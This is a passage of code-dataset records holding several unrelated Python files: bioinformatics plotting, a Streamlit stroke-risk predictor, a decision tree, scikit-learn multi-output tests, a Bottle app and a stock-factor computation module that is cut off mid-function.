product_level_dict[\"sales_Year\"]=str(year[0])\n # else:\n # product_level_dict[\"sales_Year\"]='-'\n\n # params={\"rows\":2147483647}\n # query=f'SUBID:{specid}'\n # ghsdata=list(solr_ghs_labeling_list_data.search(query,**params))\n # SignalWord=str(ghsdata[0].get(\"SIGWD\",\"-\")).strip()\n # Pictogram=str(ghsdata[0].get(\"SYMBL\",\"-\")).strip()\n # HStatement=str(ghsdata[0].get(\"HAZST\",\"-\")).strip()\n # product_level_dict[\"GHS_Information\"]=SignalWord+\", \"+Pictogram+\", \"+HStatement\n product_level_details.append(product_level_dict)\n product_level_dict={} \n\n #materila level details \n for matjson in material_details:\n material_level_dict[\"material_Number\"]=matjson.get(\"material_number\",\"-\")\n material_level_dict[\"description\"]=matjson.get(\"description\",\"-\")\n material_level_dict[\"spec_Id\"]=str(specid)+\" - \"+str(namprod)\n material_level_dict[\"BDT\"]=matjson.get(\"bdt\",\"-\")\n matnumber=matjson.get(\"material_number\",\"-\")\n # material_level_dict[\"sales_Volume\"]=str(matlist_kg.get(matnumber,\"0\"))+\" Kg\"\n material_level_details.append(material_level_dict)\n material_level_dict={}\n \n #cas level details\n params={\"rows\":2147483647,\"fl\":\"TEXT1,TEXT2,TEXT3,TEXT4\"}\n catlist=get_cas_details_on_selected_spec(specid,params)\n for data in catlist:\n cas_level_dict[\"cas_Number\"]=data.get(\"TEXT1\",\"-\")\n cas_level_dict[\"chemical_Name\"]=data.get(\"TEXT3\",\"-\")\n cas_level_dict[\"spec_Id\"]=str(specid)+\" - \"+str(namprod)\n cas_level_dict[\"pure_Spec_Id\"]=data.get(\"TEXT2\",\"-\")\n cas_level_details.append(cas_level_dict)\n cas_level_dict={}\n result={}\n result[\"productLevel\"]=product_level_details\n result[\"materialLevel\"]=material_level_details\n result[\"CASLevel\"]=cas_level_details\n\n return [result]\n except Exception as e:\n return [result]","repo_name":"momentive-pih/Python-functionapp","sub_path":"postBasicProperties/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10380071112","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.3'\n# jupytext_version: 1.0.0\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# %matplotlib inline\n# %autosave 0\n# %load_ext autoreload\n# %autoreload 2\n\nimport igraph\nimport logging\nimport numpy as np\nimport pandas as pd\nimport pkg_resources\nimport seaborn as sns\nfrom crispy.MOFA import MOFA\nimport matplotlib.pyplot as plt\nfrom scipy.stats import skew\nfrom crispy.GIPlot import GIPlot\nfrom crispy.DataImporter import PPI\nfrom sklearn.decomposition import PCA\nfrom crispy.Enrichment import Enrichment\nfrom crispy.LMModels import LMModels, LModel\nfrom multiomics_integration.notebooks import DataImport, two_vars_correlation\n\nLOG = logging.getLogger(\"multiomics_integration\")\nDPATH = pkg_resources.resource_filename(\"data\", \"/\")\nPPIPATH = pkg_resources.resource_filename(\"data\", \"ppi/\")\nTPATH = pkg_resources.resource_filename(\"tables\", \"/\")\nRPATH = pkg_resources.resource_filename(\"multiomics_integration\", \"plots/DIANN/\")\n\n\n# ### Imports\n\n# Pathways\nemt_sig = Enrichment.read_gmt(f\"{DPATH}/pathways/emt.symbols.gmt\")\nemt_sig = emt_sig[\"HALLMARK_EPITHELIAL_MESENCHYMAL_TRANSITION\"]\n\nproteasome_sig = Enrichment.read_gmt(f\"{DPATH}/pathways/proteasome.symbols.gmt\")\nproteasome_sig = proteasome_sig[\"BIOCARTA_PROTEASOME_PATHWAY\"]\n\ntranslation_sig = Enrichment.read_gmt(f\"{DPATH}/pathways/translation_initiation.symbols.gmt\")\ntranslation_sig = translation_sig[\"GO_TRANSLATIONAL_INITIATION\"]\n\n# MOFA analysis\n\nfactors, weights, rsquare = MOFA.read_mofa_hdf5(f\"{TPATH}/MultiOmics_broad.hdf5\")\n\n# Perturbation proteomics differential analysis\nperturb = pd.read_csv(f\"{DPATH}/perturbation_proteomics_diff_analysis.csv\")\nperturb_diff = pd.pivot_table(perturb, index=\"GeneSymbol\", columns=\"comparison\", values=\"diff\")\nperturb_corr = pd.DataFrame(\n {\n f: {\n c: two_vars_correlation(weights[\"proteomics\"][f], perturb_diff[c])[\"corr\"]\n for c in perturb_diff\n }\n for f in weights[\"proteomics\"]\n }\n)\n\n# Read samplesheet\nss = DataImport.read_samplesheet()\n\n# Read proteomics (Proteins x Cell lines)\nprot = DataImport.read_protein_matrix(map_protein=True)\nprot_reps = pd.read_csv(f\"{DPATH}/E0022_P06_Protein_Matrix_Raw_Mean_Intensities.tsv.gz\", sep=\"\\t\", index_col=0)\n\n# Read Transcriptomics\ngexp = DataImport.read_gene_matrix()\n\n# Read CRISPR\ncrispr = DataImport.read_crispr_matrix()\n\n# Read Methylation\nmethy = DataImport.read_methylation_matrix()\n\n# Read Drug-response\ndrespo = DataImport.read_drug_response()\n\n# Covariates\ncovariates = pd.concat(\n [\n ss[\"CopyNumberAttenuation\"],\n ss[\"GeneExpressionAttenuation\"],\n ss[\"EMT\"],\n ss[\"Proteasome\"],\n ss[\"TranslationInitiation\"],\n ss[\"CopyNumberInstability\"],\n prot.loc[[\"CDH1\", \"VIM\"]].T.add_suffix(\"_prot\"),\n gexp.loc[[\"CDH1\", \"VIM\"]].T.add_suffix(\"_gexp\"),\n pd.get_dummies(ss[\"media\"]),\n pd.get_dummies(ss[\"growth_properties\"]),\n pd.get_dummies(ss[\"tissue\"])[[\"Haematopoietic and Lymphoid\", \"Lung\"]],\n ss[[\"ploidy\", \"mutational_burden\", \"growth\", \"size\"]],\n ss[\"replicates_correlation\"].rename(\"RepsCorrelation\"),\n prot.mean().rename(\"MeanProteomics\"),\n methy.mean().rename(\"MeanMethylation\"),\n drespo.mean().rename(\"MeanDrugResponse\"),\n ],\n axis=1,\n)\n\n# Merged samplesheet\nss_merged = pd.concat(\n [\n ss,\n prot.reindex(proteasome_sig).mean().rename(\"ProteasomeMean\"),\n prot.reindex(translation_sig).mean().rename(\"TranslationInitiationMean\"),\n factors,\n prot.mean().rename(\"MeanProtein\"),\n prot.std().rename(\"StdProtein\"),\n ],\n axis=1,\n)\n\n# Covariates and factors correlation\nn_factors_corr = {}\nfor f in factors:\n n_factors_corr[f] = {}\n\n for c in covariates:\n fc_samples = list(covariates.reindex(factors[f].index)[c].dropna().index)\n n_factors_corr[f][c] = two_vars_correlation(\n factors[f][fc_samples], covariates[c][fc_samples]\n )[\"corr\"]\nn_factors_corr = pd.DataFrame(n_factors_corr)\n\n\n# ### Clustermap with weights correlation\nn_heatmaps = len(rsquare)\nnrows, ncols = list(rsquare.values())[0].shape\n\nrow_order = list(list(rsquare.values())[0].index)\ncol_order = list(list(rsquare.values())[0].columns)\n\nf, axs = plt.subplots(\n n_heatmaps + 2,\n 1,\n sharex=\"none\",\n sharey=\"none\",\n gridspec_kw={\"height_ratios\": [1.5] * n_heatmaps + [9] + [1.5]},\n figsize=(0.25 * ncols, 0.3 * n_heatmaps + 0.3 * n_factors_corr.shape[0]),\n)\n\nvmax = np.max([rsquare[k].max().max() for k in rsquare])\n\n# Factors\nfor i, k in enumerate(rsquare):\n axh = axs[i]\n\n df = rsquare[k]\n\n # Heatmap\n g = sns.heatmap(\n df.loc[row_order, col_order],\n cmap=\"Blues\",\n annot=True,\n cbar=False,\n fmt=\".1f\",\n linewidths=0.5,\n ax=axh,\n vmin=0,\n vmax=vmax,\n annot_kws={\"fontsize\": 5},\n )\n axh.set_ylabel(f\"{k} cell lines\")\n g.set_xticklabels([])\n g.set_yticklabels(g.get_yticklabels(), rotation=0, horizontalalignment=\"right\")\n\n# Covariates\nax = axs[n_heatmaps]\n\ng = sns.heatmap(\n n_factors_corr.loc[:, col_order],\n cmap=\"RdYlGn\",\n center=0,\n annot=True,\n cbar=False,\n fmt=\".2f\",\n linewidths=0.5,\n ax=ax,\n annot_kws={\"fontsize\": 5},\n)\nax.set_xlabel(\"\")\nax.set_ylabel(f\"Potential related factors\")\n\n# Perturbation\nax = axs[n_heatmaps + 1]\n\ng = sns.heatmap(\n perturb_corr.loc[:, col_order],\n cmap=\"RdYlGn\",\n center=0,\n annot=True,\n cbar=False,\n fmt=\".2f\",\n linewidths=0.5,\n ax=ax,\n annot_kws={\"fontsize\": 5},\n)\nax.set_xlabel(\"\")\nax.set_ylabel(f\"\")\n\ng.set_xticklabels(g.get_xticklabels(), rotation=0, va=\"center\")\n\nplt.subplots_adjust(hspace=0.025)\n\nplt.savefig(f\"{RPATH}/SampleAttenuation_clustermap.pdf\", bbox_inches=\"tight\")\nplt.savefig(f\"{RPATH}/SampleAttenuation_clustermap.png\", bbox_inches=\"tight\", dpi=600)\nplt.close(\"all\")\n\n\n###\nplot_df = pd.concat([\n rsquare[\"Haem\"].T.add_prefix(\"Haem_\"),\n rsquare[\"Other\"].T.add_prefix(\"Other_\"),\n n_factors_corr.T.add_prefix(\"Corr_\"),\n perturb_corr.T.add_prefix(\"Pert_\"),\n], axis=1).T\n\n\nf, axs = plt.subplots(\n 3,\n 1,\n sharex=\"col\",\n sharey=\"none\",\n gridspec_kw={\"height_ratios\": [1.5] * 2 + [9]},\n figsize=(plot_df.shape[1] * 0.25, plot_df.shape[0] * 0.25),\n)\n\nfor i, n in enumerate([\"Haem\", \"Other\"]):\n df = plot_df[[i.startswith(n) for i in plot_df.index]]\n df.index = [i.split(\"_\")[1] for i in df.index]\n g = sns.heatmap(\n df,\n cmap=\"Blues\",\n annot=True,\n cbar=False,\n fmt=\".1f\",\n linewidths=0.5,\n ax=axs[i],\n vmin=0,\n annot_kws={\"fontsize\": 5},\n )\n axs[i].set_ylabel(f\"{n} cell lines\")\n#\ndf = plot_df[[i.split(\"_\")[0] not in [\"Haem\", \"Other\"] for i in plot_df.index]]\nsns.heatmap(\n df,\n cmap=\"RdYlGn\",\n center=0,\n annot=True,\n cbar=False,\n fmt=\".2f\",\n linewidths=0.5,\n annot_kws={\"fontsize\": 5},\n ax=axs[2],\n)\n\nplt.subplots_adjust(hspace=0.025)\n\nplt.savefig(f\"{RPATH}/SampleAttenuation_clustermap_merged.pdf\", bbox_inches=\"tight\")\nplt.savefig(f\"{RPATH}/SampleAttenuation_clustermap_merged.png\", bbox_inches=\"tight\", dpi=600)\nplt.close(\"all\")\n\n\n# ####\nfor x_var, y_var in [(\"MeanProtein\", \"replicates_correlation\"), (\"StdProtein\", \"F2\"), (\"MeanProtein\", \"F2\")]:\n GIPlot.gi_regression(ss_merged[x_var], ss_merged[y_var])\n\n plt.savefig(f\"{RPATH}/SampleAttenuation_regression_{x_var}_{y_var}.pdf\", bbox_inches=\"tight\")\n plt.savefig(f\"{RPATH}/SampleAttenuation_regression_{x_var}_{y_var}.png\", bbox_inches=\"tight\", dpi=600)\n plt.close(\"all\")\n","repo_name":"EmanuelGoncalves/cancer_proteomics","sub_path":"multiomics_integration/notebooks/SampleAttenuation.py","file_name":"SampleAttenuation.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"38744719685","text":"import pandas as pd \r\nimport warnings\r\nimport streamlit as st\r\nimport joblib\r\nfrom sklearn.preprocessing import FunctionTransformer\r\nimport sklearn\r\nwarnings.filterwarnings('ignore')\r\n\r\n#----------------------------------------------------------------------------------------------------------------\r\n\r\ndef bmi_glu_preprocessing(x):\r\n bmi_bins , bmi_labels , bmi_mapper = joblib.load('bmi_bins.h5') , joblib.load('bmi_labels.h5') , joblib.load('bmi_mapper.h5')\r\n glucose_bins , glucose_labels = joblib.load('glucose_bins.h5') , joblib.load('glucose_labels.h5')\r\n glucose_mapper = joblib.load('glucose_mapper.h5')\r\n x['glucose_cat'] = pd.cut(x['avg_glucose_level'], bins = glucose_bins, labels = glucose_labels)\r\n x['bmi_cat'] = pd.cut(x['bmi'], bins = bmi_bins, labels = bmi_labels)\r\n x['glucose_cat'] = x['glucose_cat'].map(glucose_mapper).astype(int)\r\n x['bmi_cat'] = x['bmi_cat'].map(bmi_mapper).astype(int)\r\n x.drop(['bmi' , 'avg_glucose_level'] , axis = 1 , inplace = True )\r\n return x\r\n\r\n#----------------------------------------------------------------------------------------------------------------\r\n\r\nSVC = joblib.load('SVC.h5')\r\nSVC.steps.insert(0 , ('preprocessing' , FunctionTransformer(bmi_glu_preprocessing)))\r\n\r\n#----------------------------------------------------------------------------------------------------------------\r\n\r\ndef Predict(gender, age, hypertension, heart_disease, ever_married, work_type,Residence_type,avg_glucose_level,bmi,smoking_status):\r\n test = pd.DataFrame(columns=['gender', 'age', 'hypertension', 'heart_disease', 'ever_married',\r\n 'work_type', 'Residence_type', 'avg_glucose_level', 'bmi',\r\n 'smoking_status'])\r\n \r\n test.at[0,['gender']] = gender\r\n test.at[0,['age']] = age\r\n test.at[0,['hypertension']] = hypertension\r\n test.at[0,['heart_disease']] = heart_disease\r\n test.at[0,['ever_married']] = ever_married\r\n test.at[0,['work_type']] = work_type\r\n test.at[0,['Residence_type']] = Residence_type\r\n test.at[0,['avg_glucose_level']] = avg_glucose_level\r\n test.at[0,['bmi']] = bmi\r\n test.at[0,['smoking_status']] = smoking_status\r\n \r\n return SVC.predict(test)[0]\r\n \r\n#----------------------------------------------------------------------------------------------------------------\r\n \r\n \r\ndef main():\r\n st.header('estimate your stroke'.capitalize())\r\n st.image('images.jfif')\r\n gender = st.selectbox('what is your gender'.title() , ['Male', 'Female',])\r\n age = st.slider('what is your age'.title() , min_value = 1 , max_value=85 , value=20 , step=1)\r\n hypertension = st.selectbox('have you hypertension'.title() , ['NO', 'YES'])\r\n heart_disease = st.selectbox('have you heart disease'.title() , ['YES', 'NO'])\r\n ever_married = st.selectbox('have you ever married'.title() , ['Yes', 'No'])\r\n work_type = st.selectbox('what is your work type'.title() , ['Private', 'Self-employed', 'Govt_job', 'Never_worked'])\r\n Residence_type = st.selectbox('what is your Residence type'.title() , ['Urban', 'Rural'])\r\n avg_glucose_level = st.slider('enter youe glucose ratio'.title() ,min_value = 50.0 , max_value=280.0 , value=70.0 , step=0.1)\r\n bmi = st.slider('enter your bmi'.title() ,min_value = 10.0 , max_value=100.0 , value=70.0 , step=0.2 )\r\n smoking_status = st.selectbox('have you smoke'.title() , ['formerly smoked', 'never smoked', 'smokes', 'Unknown'])\r\n \r\n if st.button('predict'.title()):\r\n ans = Predict(gender, age, hypertension, heart_disease, ever_married,\r\n work_type,Residence_type,avg_glucose_level,bmi,smoking_status)\r\n if ans:\r\n st.write('Unfortunately, you are prone to a stroke, you should consult a doctor'.title() , ans)\r\n else :\r\n st.write('No need to worry, you are in good health'.title() , ans)\r\nmain()\r\n","repo_name":"tareekziad/Health-Care-Stroke-Classification-Project","sub_path":"StrokeClassifier.py","file_name":"StrokeClassifier.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4894270783","text":"import math\narr1 = [1, 35]\narr2 = [6, 9, 13, 15, 20, 25, 29, 46]\nn = len(arr1)\nm = len(arr2)\ndef merge(arr1,arr2,n,m):\n ceil = math.ceil((n+m)/2)\n temp = -1\n while True:\n print(ceil, arr1, arr2)\n if ceil == temp:\n break\n else:\n temp = ceil\n \n for i in range(ceil, m + n ):\n first = i - ceil \n second = i\n print(first, second)\n if first<n and second<n:\n if arr1[first]>arr1[second]:\n arr1[first],arr1[second] = arr1[second], arr1[first]\n elif second >= n and first<n:\n second -= n\n if arr1[first]>arr2[second]:\n arr1[first],arr2[second] = arr2[second], arr1[first]\n else:\n first -= n\n second -= n\n if arr2[first]>arr2[second]:\n arr2[first],arr2[second] = arr2[second], arr2[first]\n #updated ceil\n ceil = math.ceil(ceil/2)\nmerge(arr1, arr2, n, m)\nprint(arr1, arr2)","repo_name":"Bidipto/Fab-Feb","sub_path":"micc/5_mergertwosortedarray.py","file_name":"5_mergertwosortedarray.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23495943587","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nclass DecisionTreeClassifier(object):\n def __init__(self, max_depth):\n self.depth = 0\n self.max_depth = max_depth\n \n def fit(self, x, y, par_node={}, depth=0):\n if par_node is None: \n return None\n elif len(y) == 0:\n return None\n elif self.all_same(y):\n return {'val':y[0]}\n elif depth >= self.max_depth:\n return None\n else: \n col, cutoff, entropy = self.find_best_split_of_all(x, y) # find one split given an information gain \n y_left = y[x[:, col] < cutoff]\n y_right = y[x[:, col] >= cutoff]\n par_node = {'col': iris.feature_names[col], 'index_col':col,\n 'cutoff':cutoff,\n 'val': np.round(np.mean(y))}\n par_node['left'] = self.fit(x[x[:, col] < cutoff], y_left, {}, depth+1)\n par_node['right'] = self.fit(x[x[:, col] >= cutoff], y_right, {}, depth+1)\n self.depth += 1 \n self.trees = par_node\n return par_node\n \n def find_best_split_of_all(self, x, y):\n col = None\n min_entropy = 1\n cutoff = None\n for i, c in enumerate(x.T):\n entropy, cur_cutoff = self.find_best_split(c, y)\n if entropy == 0: # find the first perfect cutoff. Stop Iterating\n return i, cur_cutoff, entropy\n elif entropy <= min_entropy:\n min_entropy = entropy\n col = i\n cutoff = cur_cutoff\n return col, cutoff, min_entropy\n \n def find_best_split(self, col, y):\n min_entropy = 10\n n = len(y)\n for value in set(col):\n y_predict = col < value\n my_entropy = get_entropy(y_predict, y)\n if my_entropy <= min_entropy:\n min_entropy = my_entropy\n cutoff = value\n return min_entropy, cutoff\n \n def all_same(self, items):\n return all(x == items[0] for x in items)\n \n def predict(self, x):\n tree = self.trees\n results = np.array([0]*len(x))\n for i, c in enumerate(x):\n results[i] = self._get_prediction(c)\n return results\n \n def _get_prediction(self, row):\n cur_layer = self.trees\n while cur_layer.get('cutoff'):\n if row[cur_layer['index_col']] < cur_layer['cutoff']:\n cur_layer = cur_layer['left']\n else:\n cur_layer = cur_layer['right']\n else:\n return cur_layer.get('val')\n\n","repo_name":"Abhinav-Shandilya/ML101","sub_path":"DecisionTrees.py","file_name":"DecisionTrees.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24076031260","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef migrate_users(apps, *args, **kwargs):\n Collection = apps.get_model('video', 'Collection')\n User = apps.get_model('auth', 'User')\n\n user = User.objects.first()\n\n for col in Collection.objects.filter(user=1):\n col.user_id = user.pk\n col.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('video', '0002_auto_20151023_1210'),\n ]\n\n operations = [\n migrations.RunPython(migrate_users, lambda *args, **kwargs: True),\n ]\n","repo_name":"zerc/uvideo","sub_path":"video/migrations/0003_auto_20151023_1225.py","file_name":"0003_auto_20151023_1225.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33508010542","text":"import sys\nimport threading\n\n\nsys.path.insert(0, '../../src')\n\nfrom entities.vision.helpers.json_handler import JsonHandler\nfrom entities.vision.helpers.vision_helper import Color\nfrom entities.audio.audio import Audio\n\nfrom entities.threading.utils import SharedObject\nfrom entities.vision.vision import Vision\n\naudio = Audio()\n\ncolor_ranges = [Color(\"blue\", [84, 44, 52], [153, 255, 255]),\n Color(\"yellow\", [21, 110, 89], [30, 255, 255]),\n Color(\"orange\", [0, 108, 104], [6, 255, 255]),\n Color(\"green\", [28, 39, 0], [94, 255, 255]),\n Color(\"red\", [167, 116, 89], [180, 255, 255])]\njson_handler = JsonHandler(color_ranges,\n \"color_ranges.txt\",\n \"buildings.txt\")\ncolor_range = json_handler.get_color_range()\nsaved_buildings = json_handler.get_save_buildings()\nfor building in saved_buildings:\n print(str(building.number))\n\nfor gange in color_range:\n print(gange.lower)\n\nvision = Vision(SharedObject())\n\ntry:\n if len(sys.argv) > 1:\n if sys.argv[1] == \"hsv\" and sys.argv[2] == \"picker\":\n threading.Thread(target=vision.helpers.hsv_picker.run, args=(color_range, json_handler)).start()\n elif sys.argv[1] == \"saving\":\n threading.Thread(target=vision.saving.run, args=(color_range, json_handler)).start()\n elif sys.argv[1] == \"recognize\":\n threading.Thread(target=vision.recognize.run, args=(color_range, audio, saved_buildings)).start()\n else:\n print(\"[ERROR] Wrong argument given..\")\n\n # Default no argument\n else:\n threading.Thread(target=vision.recognize.run, args=(color_range, audio, saved_buildings)).start()\nexcept AttributeError:\n print(\"[ERROR] Something went wrong..\")\n\n","repo_name":"SvenMark/IDP","sub_path":"src/tests/vision_test.py","file_name":"vision_test.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"5873729","text":"import numpy as np\nimport scipy.sparse as sp\n\nfrom sklearn.utils.testing import assert_almost_equal\nfrom sklearn.utils.testing import assert_raises\nfrom sklearn.utils.testing import assert_raises_regex\n\nfrom sklearn import datasets\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.linear_model import Lasso\nfrom sklearn.multioutput import MultiOutputRegressor\n\n\ndef test_multi_target_regression():\n X, y = datasets.make_regression(n_targets=3)\n X_train, y_train = X[:50], y[:50]\n X_test, y_test = X[50:], y[50:]\n\n references = np.zeros_like(y_test)\n for n in range(3):\n rgr = GradientBoostingRegressor(random_state=0)\n rgr.fit(X_train, y_train[:, n])\n references[:,n] = rgr.predict(X_test)\n\n rgr = MultiOutputRegressor(GradientBoostingRegressor(random_state=0))\n rgr.fit(X_train, y_train)\n y_pred = rgr.predict(X_test)\n\n assert_almost_equal(references, y_pred)\n\n\ndef test_multi_target_regression_one_target():\n # Test multi target regression raises\n X, y = datasets.make_regression(n_targets=1)\n X_train, y_train = X[:50], y[:50]\n X_test, y_test = X[50:], y[50:]\n\n rgr = MultiOutputRegressor(GradientBoostingRegressor(random_state=0))\n assert_raises(ValueError, rgr.fit, X_train, y_train)\n\n\ndef test_multi_target_sparse_regression():\n X, y = datasets.make_regression(n_targets=3)\n X_train, y_train = X[:50], y[:50]\n X_test, y_test = X[50:], y[50:]\n\n for sparse in [sp.csr_matrix, sp.csc_matrix, sp.coo_matrix, sp.dok_matrix,\n sp.lil_matrix]:\n rgr = MultiOutputRegressor(Lasso(random_state=0))\n rgr_sparse = MultiOutputRegressor(Lasso(random_state=0))\n\n rgr.fit(X_train, y_train)\n rgr_sparse.fit(sparse(X_train), y_train)\n\n assert_almost_equal(rgr.predict(X_test), rgr_sparse.predict(sparse(X_test)))\n\n\ndef test_multi_target_sample_weights_api():\n X = [[1,2,3], [4,5,6]]\n y = [[3.141, 2.718], [2.718, 3.141]]\n w = [0.8, 0.6]\n\n rgr = MultiOutputRegressor(Lasso())\n assert_raises_regex(ValueError, \"does not support sample weights\",\n rgr.fit, X, y, w)\n\n # no exception should be raised if the base estimator supports weights\n rgr = MultiOutputRegressor(GradientBoostingRegressor(random_state=0))\n rgr.fit(X, y, w)\n\n\ndef test_multi_target_sample_weights():\n # weighted regressor\n Xw = [[1,2,3], [4,5,6]]\n yw = [[3.141, 2.718], [2.718, 3.141]]\n w = [2., 1.]\n rgr_w = MultiOutputRegressor(GradientBoostingRegressor(random_state=0))\n rgr_w.fit(Xw, yw, w)\n\n # unweighted, but with repeated samples\n X = [[1,2,3], [1,2,3], [4,5,6]]\n y = [[3.141, 2.718], [3.141, 2.718], [2.718, 3.141]]\n rgr = MultiOutputRegressor(GradientBoostingRegressor(random_state=0))\n rgr.fit(X, y)\n\n X_test = [[1.5,2.5,3.5], [3.5,4.5,5.5]]\n assert_almost_equal(rgr.predict(X_test), rgr_w.predict(X_test))\n","repo_name":"angadgill/Parallel-SGD","sub_path":"scikit-learn/sklearn/tests/test_multioutput.py","file_name":"test_multioutput.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"11149136855","text":"import os\nfrom bottle import Bottle, default_app, run, hook, response\n\napp = Bottle()\n\nwith app:\n assert app is default_app()\n\n @hook('after_request')\n def enable_cors():\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, OPTIONS'\n response.headers['Access-Control-Allow-Headers'] = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'\n\n # Capture routes defined in other modules\n import index\n\n # After first push to heroku, set environment variable with:\n # heroku config:set APP_LOCATION=heroku\n if os.environ.get('APP_LOCATION') == 'heroku':\n run(host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 5000)))\n else:\n run(host='localhost', port=int(os.environ.get('PORT', 8000)), debug=True)","repo_name":"lucianaa/miniapp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35860649695","text":"#!/usr/bin/env python\n#coding:utf-8\n\"\"\"\n Author: Wusf --<wushifan221@gmail.com>\n Purpose: \n Created: 2016/1/25\n\"\"\"\n\nimport os,numpy\nimport sqlite3 as lite\nfrom ConfigParser import ConfigParser\n\nimport Tools.GetLocalDatabasePath as GetPath\nimport Tools.GetTradeDays as GetTrdDay\nimport UpdateFactorDatabase.FundamentalFactors._CalculateFactorValues as CalcFactorVals\nimport InvestmentUniverse.GetIndexConstituentStocks as GetIndexConstituentStocks\nimport Tools.LogOutputHandler as LogHandler\nimport Configs.RootPath as Root\nRootPath = Root.RootPath \n\n\n########################################################################\nclass ComputeFactorValues(object):\n \"\"\"\n 计算给定投资空间中的所有股票\n 基本面因子值\n \"\"\"\n \n #----------------------------------------------------------------------\n def __init__(self,logger=None):\n \"\"\"Constructor\"\"\"\n #Create log file\n if logger == None:\n self.logger = LogHandler.LogOutputHandler(\"ComputeFactorsAndZScores\")\n else: \n self.logger = logger\n \n dbPathProcessedData = GetPath.GetLocalDatabasePath()[\"EquityDataRefined\"]\n self.dbPathProcessedData = dbPathProcessedData\n self.totalTradeDay = GetTrdDay.GetTradeDays() \n \n\n #----------------------------------------------------------------------\n def LoadSourceData(self,dbPathFdmtData,dbPathMktData,dbPathConstituentStocks):\n \"\"\"\n 读取本地数据库数据\n \"\"\"\n self.objConstituentStocks = GetIndexConstituentStocks.GetIndexConstituentStocks(dbPathConstituentStocks,self.logger) \n self.objCalcFactorVals = CalcFactorVals.CalculateFactorValues(dbPathFdmtData,dbPathMktData,None,self.logger)\n \n \n #----------------------------------------------------------------------\n def LoadFactorAlgos(self,factorStyle):\n \"\"\"\n Load algorithem for computing factor values\n \"\"\"\n self.factorNames = []\n self.factorAlgos = []\n for style in factorStyle:\n path = RootPath+\"\\\\UpdateFactorDatabase\\\\FundamentalFactors\\\\FactorAlgos\\\\\"+style\n algoFiles = os.listdir(path)\n for algoFile in algoFiles: \n algoName = algoFile.split('.')\n if algoName[0][0]!='_' and algoName[1]==\"py\":\n self.logger.info(\"<{}>-Load factor algo {} {}\".format(__name__.split('.')[-1],style,algoName[0]))\n self.factorNames.append(algoName[0])\n exec(\"import UpdateFactorDatabase.FundamentalFactors.FactorAlgos.{}.{} as algo\".format(style,algoName[0]))\n self.factorAlgos.append(algo)\n \n \n #----------------------------------------------------------------------\n def ComputeAndSaveFactorValues(self,factorDatabaseName,begDate):\n \"\"\"\n Start to run factor computation\n \"\"\"\n self.conn = lite.connect(self.dbPathProcessedData+factorDatabaseName+\".db\")\n self.conn.text_factory = str\n self.cur = self.conn.cursor()\n self.cur.execute(\"PRAGMA synchronous = OFF\")\n self.cur.execute(\"DROP TABLE IF EXISTS FundamentalFactors\")\n sqlStr = \"\"\n for item in self.factorNames:\n sqlStr+=','+item+\" FLOAT\"\n self.cur.execute(\"\"\"\n CREATE TABLE FundamentalFactors(StkCode TEXT,\n StkName TEXT,\n IndusCode TEXT,\n IndusName TEXT,\n Date TEXT,\n AcctPeriod TEXT,\n ReportType TEXT\n {})\n \"\"\".format(sqlStr)) \n \n insertSql = \"?,?,?,?,?,?,?\"+len(self.factorAlgos)*\",?\"\n \n allStkCodes = self.objCalcFactorVals.GetAllStockCodes()\n \n for stk in allStkCodes:\n self.logger.info(\"<{}>-Compute factor of {}\".format(__name__.split('.')[-1],stk))\n declareDate = self.objCalcFactorVals.GetFundamentalDataDeclareDate(stk,begDate)\n\n for dt in declareDate: \n vals = self.objCalcFactorVals.Calculate(dt,180,stk,self.factorAlgos)\n stkInfo = self.objConstituentStocks.GetStockNameAndIndustry(stk,dt)\n if vals!=None and vals[-1]!=None:\n if stkInfo!=None:\n row = [stk,stkInfo[0],stkInfo[1],stkInfo[2],dt,vals[0],vals[1]]\n else:\n row = [stk,None,None,None,dt,vals[0],vals[1]]\n for val in vals[2]:\n row.append(val)\n self.cur.execute(\"INSERT INTO FundamentalFactors VALUES ({})\".format(insertSql),tuple(row))\n self.conn.commit()\n self.cur.execute(\"CREATE INDEX Idf ON FundamentalFactors(Date,StkCode)\")\n self.conn.commit()\n \n \n #----------------------------------------------------------------------\n def ComputeAndSaveZScores(self,configPath,classification):\n \"\"\"\n 因子值标准化\n \"\"\"\n conf = ConfigParser()\n conf.read(configPath)\n self.logger.info(\"<{}>-Load industry configs\".format(__name__.split('.')[-1]))\n indusList = conf.items(classification)\n conn = lite.connect(self.dbPathProcessedData+self.factorDatabaseName+\".db\")\n conn.text_factory = str\n cur = conn.cursor()\n 